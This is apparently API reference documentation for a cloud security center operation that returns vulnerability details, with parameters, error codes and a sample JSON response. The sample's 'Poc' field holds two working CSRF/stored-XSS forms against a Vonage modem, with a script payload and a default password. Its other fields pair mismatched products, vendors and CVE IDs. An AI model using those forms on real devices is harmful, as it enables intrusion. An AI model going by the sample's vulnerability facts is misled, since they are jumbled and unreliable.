Queries the details about a vulnerability.
Debugging
Authorization information
The following table shows the authorization information corresponding to the API. The authorization information can be used in the Action policy element to grant a RAM user or RAM role the permissions to call this API operation. Description:
- Operation: the value that you can use in the Action element to specify the operation on a resource.
- Access level: the access level of each operation. The levels are read, write, and list.
- Resource type: the type of the resource on which you can authorize the RAM user or the RAM role to perform the operation. Take note of the following items:
- The required resource types are displayed in bold characters.
- If the permissions cannot be granted at the resource level,
All Resourcesis used in the Resource type column of the operation.
- Condition Key: the condition key that is defined by the cloud service.
- Associated operation: other operations that the RAM user or the RAM role must have permissions to perform to complete the operation. To complete the operation, the RAM user or the RAM role must have the permissions to perform the associated operations.
| Operation | Access level | Resource type | Condition key | Associated operation |
|---|---|---|---|---|
| yundun-sas:DescribeVulDetails | get |
|
| none |
Request parameters
| Parameter | Type | Required | Description | Example |
|---|---|---|---|---|
| Lang | string | Yes | The language of the content within the request and response. Valid values:
| zh |
| Type | string | Yes | The type of the vulnerability. Valid values:
| sca |
| Name | string | Yes | The name of the vulnerability. Note
You can call the DescribeGroupedVul or DescribeVulList operation to query the names of vulnerabilities.
| SCA:ACSV-2020-052801 |
| AliasName | string | Yes | The vulnerability announcement. | RHSA-2019:3197-Important: sudo security update |
| ResourceDirectoryAccountId | long | No | The Alibaba Cloud account ID of the member in the resource directory. Note
You can call the DescribeMonitorAccounts operation to obtain the IDs.
| 127608589417**** |
Response parameters
Examples
Sample success responses
JSONformat
{
"RequestId": "EDA40EA3-6265-5900-AD99-C83E4F109CA8",
"Cves": [
{
"Summary": "Chanjet T-Plus is an Internet business management software. There is an unauthorized access vulnerability in one of its interfaces disclosed on the Internet. Attackers can construct malicious requests to upload malicious files to execute arbitrary code and control the server.",
"Complexity": "LOW",
"Product": "Log4j2",
"PocCreateTime": 1554189334000,
"CveId": "CVE-2019-9167",
"CnvdId": "CNVD-2019-9167",
"Reference": "https://example.com",
"CvssScore": "10.0",
"Vendor": "Apache",
"PocDisclosureTime": 1554189334000,
"Classify": "remote_code_execution",
"CvssVector": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"VulLevel": "serious",
"ReleaseTime": 1554189334000,
"Title": "Chanjet T-Plus SetupAccount/Upload. Aspx file upload vulnerability(CNVD-2022-60632)",
"Solution": "<p>At present, Chanjet has urgently released a vulnerability patch to fix the vulnerability. CNVD recommends affected units and users to upgrade to the latest version immediately:</p>↵<p>https://www.chanjetvip.com/product/goods/goods-detail?id=53aaa40295d458e44f5d3ce5</p>↵<p>At the same time, organizations and users affected by the vulnerability are requested to immediately follow the steps below to conduct self-inspection and repair work:</p>↵<ol>↵<li><p>User self-check steps:↵<br />Check whether website/bin/load.aspx.cdcab7d2.compiled, website/bin/App_Web_load.aspx.cdcab7d2.dll, and tplus/Load.aspx files exist locally. If they exist, it means that they have been poisoned, and you must reinstall the system and install the product. patch.</p>↵</li>↵<li><p>Non-poisoned users please:↵<br />1) Update the latest product patch.↵<br />2) Install anti-virus software and update the virus database in time.↵<br />3) Upgrade the lower version of IIS and Nginx to IIS10.0 and Windows 2016.↵<br />4) Local installation customers need to confirm whether the backup file is complete as soon as possible, and do off-site backup. Customers on the cloud should enable the mirroring function in time.↵<br />5) Users who fail to update the patch in time can contact Chanjet technical support and take temporary preventive measures such as deleting files.</p>↵</li>↵<li><p>Poisoned users please:↵<br />1) Check whether the server has taken regular snapshots or backups. If so, you can restore data through snapshots or backups.↵<br />2) Contact Chanjet technical support to confirm whether it has the conditions and operation methods to restore data from backup files.</p>↵</li>↵</ol>↵<p>If you have any technical problems, please contact Chanjet technical support: 4006600566-9</p>",
"Content": "Apache Shiro is a user authentication and authorization framework for a wide range of rights management applications.↵Recently, Apache Shiro released version 1.7.0, which fixes the Apache Shiro authentication bypass vulnerability (CVE-2020-17510).↵Attackers can bypass Shiro's authentication using malicious requests containing payloads.↵↵Related bugs:↵CVE-2020-17510 Shiro < 1.7.0 Validation Bypass Vulnerability↵CVE-2020-13933 Shiro < 1.6.0 Validation Bypass Vulnerability↵CVE-2020-11989 Shiro < 1.5.3 Validation Bypass Vulnerability↵CVE-2020-1957 Shiro < 1.5.2 Validation Bypass Vulnerability↵CVE-2016-6802 Shiro < 1.3.2 Validation Bypass Vulnerability\nCheck whether the fastjson version currently running on the system is in the affected version and whether safeMode is configured to disable autoType. If it is in the affected version and safeMode is not configured to disable autoType, the vulnerability is considered to exist.",
"Poc": "NewDomain.html\nThe x and y values will need to be changed accordingly\n<html>\n<p>Authenticated Stored CSRF/XSS - Vonage Modem</p>\n<form method=\"POST\" action=\"http://192.168.15.1/goform/RgParentalBasic\">\n<input type=\"hidden\" name=\"RemoveContentRule\" value=\"0\" />\n<input type=\"hidden\" name=\"AddContentRule\" value=\"0\" />\n<input type=\"hidden\" name=\"ContentRules\" value=\"0\" />\n<input type=\"hidden\" name=\"RuleSelect\" value=\"0\" / >\n<input type=\"hidden\" name=\"NewKeyword\" value=\"\" / >\n<input type=\"hidden\" name=\"KeywordAction\" value=\"0\" />\n<input type=\"hidden\" name=\"NewDomain\" value=\"test'><script>alert(1)</script>\" />\n<input type=\"hidden\" name=\"x\" value=\"50\" />\n<input type=\"hidden\" name=\"y\" value=\"15\" />\n<input type=\"hidden\" name=\"DomainAction\" value=\"1\" />\n<input type=\"hidden\" name=\"AllowedDomainAction\" value=\"0\" />\n<input type=\"hidden\" name=\"ParentalPassword\" value=\"Broadcom\" />\n<input type=\"hidden\" name=\"ParentalPasswordReEnter\" value=\"Broadcom\" />\n<input type=\"hidden\" name=\"AccessDuration\" value=\"30\" />\n<input type=\"submit\" title=\"Exploit\" />\n</form>\n</html>\n \nNewKeyword.html\nThe x and y values will need to be changed accordingly\n<html>\n<p>Authenticated Stored CSRF/XSS - Vonage Modem</p>\n<form method=\"POST\" action=\"http://192.168.15.1/goform/RgParentalBasic\">\n<input type=\"hidden\" name=\"RemoveContentRule\" value=\"0\" />\n<input type=\"hidden\" name=\"AddContentRule\" value=\"0\" />\n<input type=\"hidden\" name=\"ContentRules\" value=\"0\" />\n<input type=\"hidden\" name=\"RuleSelect\" value=\"0\" / >\n<input type=\"hidden\" name=\"NewKeyword\" value=\"test'><script>alert(1)</script>\" / >\n<input type=\"hidden\" name=\"x\" value=\"61\" />\n<input type=\"hidden\" name=\"y\" value=\"12\" />\n<input type=\"hidden\" name=\"KeywordAction\" value=\"1\" />\n<input type=\"hidden\" name=\"NewDomain\" value=\"\" />\n<input type=\"hidden\" name=\"DomainAction\" value=\"0\" />\n<input type=\"hidden\" name=\"AllowedDomainAction\" value=\"0\" />\n<input type=\"hidden\" name=\"ParentalPassword\" value=\"Broadcom\" />\n<input type=\"hidden\" name=\"ParentalPasswordReEnter\" value=\"Broadcom\" />\n<input type=\"hidden\" name=\"AccessDuration\" value=\"30\" />\n<input type=\"submit\" title=\"Enable Service\" />\n</form>\n</html>",
"Classifys": [
{
"Description": "Remote code execution\n",
"Classify": "remote_code_execution",
"DemoVideoUrl": "https://example.com"
}
],
"OtherId": "CVE-2020-8597",
"InstanceName": "sql-test-001",
"InternetIp": "47.114.XX.XX",
"IntranetIp": "172.19.XX.XX",
"TargetId": "m-bp17m0pc0xprzbwo****",
"TargetName": "frontend",
"CveLink": "https://avd.aliyun.com/detail/CVE-2022-1184"
}
]
}Error codes
| HTTP status code | Error code | Error message | Description |
|---|---|---|---|
| 400 | InnerError | InnerError | - |
| 400 | DataExists | %s data exist | - |
| 400 | RdCheckNoPermission | Resource directory account verification has no permission. | - |
| 403 | NoPermission | caller has no permission | You are not authorized to do this operation. |
| 500 | RdCheckInnerError | Resource directory account service internal error. | - |
| 500 | ServerError | ServerError | - |
For a list of error codes, visit the Service error codes.
Change history
| Change time | Summary of changes | Operation |
|---|---|---|
| 2024-09-25 | The Error code has changed | View Change Details |
| 2024-09-24 | The Error code has changed | View Change Details |
| 2023-10-24 | The Error code has changed. The response structure of the API has changed | View Change Details |
| 2023-08-07 | The Error code has changed. The response structure of the API has changed | View Change Details |
| 2023-07-20 | The Error code has changed. The request parameters of the API has changed | View Change Details |
| 2023-03-16 | The Error code has changed | View Change Details |